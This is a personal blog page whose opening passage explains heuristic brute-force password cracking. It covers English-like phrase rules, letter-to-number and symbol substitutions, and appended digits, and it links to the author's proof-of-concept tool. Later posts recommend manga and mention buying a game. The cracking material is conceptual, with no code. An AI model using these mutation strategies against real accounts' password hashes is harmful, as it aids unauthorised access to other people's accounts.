  • "row row fight the power" is a valid phrase
  • "it's dangerous to go alone, take this" is not a valid phrase (because there are three spaces in a row)

Word Repetition

The same word can never be repeated more than three times in a valid English-like phrase.


  • "row row fight the power" is a valid phrase
  • "row row row row your boat" is not a valid phrase

Phrase Ending Punctuation (! ? .)

Phrase ending punctuation may only appear at the end of a phrase.


  • "zelda is so over powered in brawl!" is a valid phrase
  • "zelda is so! over powered in brawl!" is not a valid phrase


Commas may only appear at the end of words, and never at the end of a phrase.


  • "charizard is cool, but so is blastoise" is a valid phrase
  • "cooking is so fun," is not a valid phrase


In order for an English-like phrase to be considered valid, each word in the phrase must be a valid English-like word.

So what about those passwords that include numbers, or goofy punctuation?

While heuristic brute forcing algorithms are great for generating English like words and phrases, things begin to be a lot more complicated if your target password includes numbers or funky punctuation ($, &, @, etc).

Going back to the topic of the psychology of password creation, remember that in general people pick passwords that are actually made up of words. Keeping this in mind, we can reasonably conclude that passwords that include numbers and/or funky punctuation still follow this rule, but the word(s) in the password are obfuscated by these non-standard characters. Another point to consider for passwords that include numbers only, is that often they're just appended to the end of a password.

Take for instance the password "jalapeno". It's a valid English-like word, and using it as a base, you can obfuscate it with numbers and funky punctuation.


  • "jalapen0", "jalap3no", "j414p3n0" - letters replaced with numbers
  • "jalapeno1", "jalapeno123" - numbers appended
  • "j@l@peno" - letters replaced with punctuation

All of the passwords above would not be considered valid English-like words, but under all of the numbers and punctuation, they actually are. So in order to crack passwords that include numbers and/or funky punctuation using a heuristic brute force algorithm, you need to develop a method that can mutate strings generated by the algorithm (making alterations like in the examples above) and then test all the password variants as well as the original password string against your target hash.

Are there any heuristic brute forcing programs available?

Why yes there are! I maintain a small proof-of-concept Ruby application/gem that implements heuristic brute forcing. See, http://github.com/jamespenguin/gentle-brute for more details.


Heuristic brute forcing provides hackers with the ability to crack long and complicated passwords using brute force style password cracking, while not wasting eons trying unrealistic passwords.

To illustrate my point, let's pit heuristic brute forcing against standard brute forcing to crack a five character password consisting of the letters a-z.

  • Using heuristic brute forcing (via the Ruby program above): 517,839 potential phrases
  • Using standard brute forcing: 11,881,376 potential phrases

That's 96% fewer phrases to try using heuristic brute forcing, compared to standard brute forcing!

Five Manga You Should Definitely Check Out

March 21, 2012 at 12:00 PM

Ever since I started developing the iManga Reader app back in 2009, I've had the chance to read a lot of different manga. So, listed below in no particular order are five manga that I recommend you check out.


My Thoughts
Yotsuba is basically what you would get if you were to combine Calvin and Hobbes with Azumanga Daioh. It's about as delightful as a series can get, and will definitely make you smile.

Series Description
Yotsuba is a strange little girl with a big personality! Even in the most trivial, unremarkable encounters, Yotsuba's curiosity and enthusiasm quickly turns the everyday into the extraordinary!

Yotsuba&! received an Excellence Award for Manga at the 2006 Japan Media Arts Festival. In 2008 Yotsuba&! was nominated for the 12th Osamu Tezuka Culture Award and the Eisner Award "Best Publication for Kids" category, but did not win either, and was runner-up for the first annual Manga Taisho award.

11 Volumes (Ongoing)

Full Metal Panic! Sigma

My Thoughts
If you liked the Full Metal Panic! The Second Raid anime, then you will love this manga. The events from the TSR anime cover about the first twenty chapters of Full Metal Panic! Sigma, and there is a lot more things to know about. The manga is an adaptation of the Full Metal Panic! light novels, and will (once it's finished being released) cover the entirety of the FMP story.

Series Description
Following the Tuatha de Danaan's seajacking incident, things are back to normal at Jindai High School in Tokyo, or as normal as they get with Sousuke guarding Kaname. After finding out who betrayed Mithril and caused the seajacking incident, Kurz and Mao are sent on a top secret mission in order to capture and bring the traitor back.

However, Sousuke and Kaname's lives are about to change when they meet Leonard Testarossa, a high ranking member of a mysterious group named Amalgam. After their meeting, Leonard warns her that he would do anything to recruit her even if it means war in the streets of Tokyo.

16 Volumes (Ongoing)


My Thoughts
I really liked the Beck anime, but it only covered the first one or two major story arcs of the manga, and there is a lot more that happens. One characteristic about Beck's story that I really enjoy, is that it never really gets stale. As time moves forward, the stakes are always being raised, and the band's situation is always changing. Also, whether they are seeing success or failure, the members of the band are always pushing forward toward their dream of becoming world famous. Beck is a fantastic manga, and if you enjoyed the anime in the slightest, you should start reading it immediately.

Series Description
For the first 14 years of his life, Yukio Tanaka has been one heck of a boring guy. He has no hobbies, weak taste in music, and only a small vestige of a personality. He yearns for an exciting life, but his shy, and somewhat neurotic personality makes him his own worst enemy. Little does he know that his life will be forever changed when he meets Ryusuke Minami, a wild and unpredictable 16-year old fresh from America, who happens to be in a rock-and-roll band named after his Frankenstein-like patched dog--Beck.

34 Volumes (Complete)


My Thoughts
I think it's really hard to find "good" horror manga, it's just not a medium that lends itself well towards creating a scary atmosphere. There are a few exceptions, like most of the things written by Junji Ito or Goth (listed below), but most of the horror manga I've come across has been pretty sub-par or overrated.

That being said, I loved Ibitsu. Remina Kanbe (pictured to the left) sets the standard for what it means to be yandere, and makes Yuno from Mirai Nikki seem reasonable and well adjusted. Because it's so short, Ibitsu's story wastes no time getting things started, and presses forward at a rapid pace that only intensifies as it progresses. It's a great story, and will have you thinking twice about telling people whether or not you have a sister by the time you've finished with it.

Series Description
A boy went to take his trash out late one night, and found a strange, creepy, gothic-lolita-dressed woman sitting amongst the garbage bags. She asked if he had a little sister, and he answered her, hurrying afterwards back to his apartment. When he looked out the window, she was gone. Who is the strange woman, and why does she give him such a bad feeling?

2 Volumes (Complete)

Bio-Meat: Nectar

My Thoughts
The story of Bio-Meat, is basically the gray goo end-of-the-world scenario brought to life in the form of organic material eating monsters designed to replace pigs and cows as humanity's source of delicious meat products.

There are two things that I really enjoy about Bio-Meat. The first, is that the inevitable loss of control of the BM monsters isn't some unexplained world-wide all hope is lost apocalypse like a zombie outbreak always seems to be. Instead, the outbreak is portrayed as more of a war with the BM, where the balance of power on both sides shifts back and forth as the plot progresses.

The other thing I really enjoyed about this manga, is that its story spans a lot of time with the same characters. There are three major story arcs, which are each separated by about 5 to 10 years, and it's nice to read an end-of-the world manga where you get to see how things progress (and fall apart) as time marches forward.

Series Description
Japan was in need of food. Bio-engineers had the solution, BioMeat. A thing which feeds on everything but glass and vinyl. In return they produce a endless supply of food. One day a BM escapes into the city. What will happen with a killing machine on the loose?

12 Volumes (Complete)

BRB, Embracing Eternity

March 6, 2012 at 12:00 PM

Just bought this today, suuuuper stoked to play it. I will say this though, I am not very happy that EA has chosen to hold my game hostage until I install their Steam rip-off, and register an account with them.

At least they aren't making me install Gamespy or Banzai Buddy :/

IP hostage negotiations aside, it's time to go save the universe, and make this happen.

Go to Page

Copyright © Brandon Smith